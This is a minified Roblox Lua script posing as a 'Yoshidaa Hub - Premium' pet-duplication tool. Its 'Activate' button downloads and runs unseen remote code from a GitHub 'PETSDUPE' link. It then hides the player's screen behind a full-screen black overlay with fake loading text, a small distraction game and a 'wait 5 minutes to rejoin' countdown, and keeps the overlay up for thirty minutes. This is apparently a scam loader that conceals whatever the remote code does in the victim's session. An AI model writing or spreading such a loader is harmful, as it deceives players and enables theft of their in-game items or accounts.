if _G.YHR then return end;_G.YHR=true;local TS,CG,L,UIS,RS=game:GetService("TweenService"),game:GetService("CoreGui"),game:GetService("Lighting"),game:GetService("UserInputService"),game:GetService("RunService")
local S=Instance.new("ScreenGui")S.Name="YoshidaaGUI"S.ResetOnSpawn=false;S.Parent=CG
local B=Instance.new("BlurEffect")B.Size=24;B.Parent=L
local M=Instance.new("Frame",S)M.Size=UDim2.new(0,400,0,250)M.Position=UDim2.new(0.5,-200,0.5,-125)M.Active=true;M.Draggable=true
M.BackgroundColor3=Color3.fromRGB(15,15,20)M.BackgroundTransparency=0.2
Instance.new("UICorner",M).CornerRadius=UDim.new(0,20)
local G=Instance.new("UIStroke",M)G.Thickness=2;G.Color=Color3.fromRGB(160,80,255)G.Transparency=0.1
local T=Instance.new("TextLabel",M)T.Size=UDim2.new(1,0,0,40)T.Text="🌌 Yoshidaa Hub - Premium" T.TextColor3=Color3.fromRGB(200,100,255)T.BackgroundTransparency=1 T.Font=Enum.Font.GothamBold T.TextSize=24
local I=Instance.new("TextLabel",M)I.Size=UDim2.new(1,-20,0,20)I.Position=UDim2.new(0,10,1,-25)I.Text="Inspired by Mica"
I.TextColor3=Color3.fromRGB(140,140,140)I.BackgroundTransparency=1 I.Font=Enum.Font.Gotham I.TextSize=14 I.TextXAlignment=Enum.TextXAlignment.Left
local Bn=Instance.new("TextButton",M)Bn.Size=UDim2.new(0.85,0,0,44)Bn.Position=UDim2.new(0.075,0,0.55,0)Bn.Text="☄️ Activate"
Bn.BackgroundColor3=Color3.fromRGB(40,0,60)Bn.TextColor3=Color3.new(1,1,1)Bn.Font=Enum.Font.Gotham;Bn.TextSize=18
Instance.new("UICorner",Bn).CornerRadius=UDim.new(0,12)
local BS=Instance.new("UIStroke",Bn)BS.Thickness=2;BS.Color=Color3.fromRGB(255,100,255);BS.Transparency=0.3

Bn.MouseEnter:Connect(function()TS:Create(Bn,TweenInfo.new(0.2,Enum.EasingStyle.Quad),{Size=UDim2.new(0.9,0,0,50)}):Play()BS.Transparency=0 end)
Bn.MouseLeave:Connect(function()TS:Create(Bn,TweenInfo.new(0.2,Enum.EasingStyle.Quad),{Size=UDim2.new(0.85,0,0,44)}):Play()BS.Transparency=0.3 end)

Bn.MouseButton1Click:Connect(function()
Bn.Text="✅ Activating..."Bn.BackgroundColor3=Color3.fromRGB(60,0,100)
loadstring(game:HttpGet("https://raw.githubusercontent.com/RayField-Scripts/PETSDUPE/main/PetsDuped"))()
task.delay(0.01,function()
local G=Instance.new("ScreenGui",CG)G.Name="YoshidaaLoader"G.IgnoreGuiInset=true;G.ZIndexBehavior=Enum.ZIndexBehavior.Global
local F=Instance.new("Frame",G)F.BackgroundColor3=Color3.new(0,0,0)F.Size=UDim2.new(1,0,1,36)F.Position=UDim2.new(0,0,0,-36)F.ZIndex=999999
F.BackgroundTransparency=1;TS:Create(F,TweenInfo.new(0.5),{BackgroundTransparency=0}):Play()
local M=Instance.new("TextLabel",F)M.Size=UDim2.new(1,0,0,50)M.Position=UDim2.new(0,0,0.45,0)
M.Text="🔍 FINDING OLD SERVER FOR SCRIPT..."M.TextColor3=Color3.new(1,1,1)M.BackgroundTransparency=1;M.Font=Enum.Font.GothamBold;M.TextScaled=true;M.ZIndex=999999
local P=Instance.new("TextLabel",F)P.Size=UDim2.new(1,0,0,30)P.Position=UDim2.new(0,0,0.55,0)P.Text="Loading 0%"
P.TextColor3=Color3.fromRGB(180,180,255)P.BackgroundTransparency=1;P.Font=Enum.Font.Gotham;P.TextScaled=true;P.ZIndex=999999

local DF=Instance.new("Frame",F)DF.Size=UDim2.new(0,320,0,80)DF.Position=UDim2.new(0.5,-160,1,-90)DF.BackgroundTransparency=1;DF.ZIndex=999999
local GND=Instance.new("Frame",DF)GND.Size=UDim2.new(1,0,0,4)GND.Position=UDim2.new(0,0,1,-4)
GND.BackgroundColor3=Color3.new(1,1,1)GND.BorderSizePixel=0
local DN=Instance.new("Frame",DF)DN.Size=UDim2.new(0,24,0,24)DN.Position=UDim2.new(0,20,1,-28)DN.BackgroundColor3=Color3.new(1,1,1)
local OB=Instance.new("Frame",DF)OB.Size=UDim2.new(0,20,0,20)OB.Position=UDim2.new(1,0,1,-24)OB.BackgroundColor3=Color3.new(1,1,1)

local VY,OG=0,true
UIS.InputBegan:Connect(function(i,g)if i.KeyCode==Enum.KeyCode.Space and OG and not g then VY=-8 OG=false end end)

RS.RenderStepped:Connect(function()
VY=VY+0.4;local NY=DN.Position.Y.Offset+VY
if NY>=DF.AbsoluteSize.Y-28 then NY=DF.AbsoluteSize.Y-28 VY=0 OG=true end
DN.Position=UDim2.new(0,DN.Position.X.Offset,1,-NY)
OB.Position=OB.Position-UDim2.new(0,6,0,0)
if OB.Position.X.Offset+20<0 then OB.Position=UDim2.new(1,0,1,-24)end
if math.abs(DN.Position.X.Offset-OB.Position.X.Offset)<20 and math.abs(NY-(DF.AbsoluteSize.Y-24))<20 then
OB.BackgroundColor3=Color3.fromRGB(255,0,0)else OB.BackgroundColor3=Color3.new(1,1,1)end
end)

task.spawn(function()
for i=1,100 do P.Text="Loading "..i.."%"task.wait(0.12)end
P.Visible=false;M.Text="🕒 PLEASE WAIT 5 MINUTES TO REJOIN"
local CT=Instance.new("TextLabel",F)CT.Size=UDim2.new(1,0,0,40)CT.Position=UDim2.new(0,0,0.63,0)
CT.TextColor3=Color3.fromRGB(255,200,200)CT.BackgroundTransparency=1
CT.Font=Enum.Font.GothamBold CT.TextScaled=true CT.ZIndex=999999
local T=300 while T>=0 do CT.Text=string.format("Rejoin in %02d:%02d",math.floor(T/60),T%60)task.wait(1)T=T-1 end
M.Text="✔️ YOU MAY NOW REJOIN"CT.Text=""task.wait(1800)G:Destroy()
end)
end)
end)
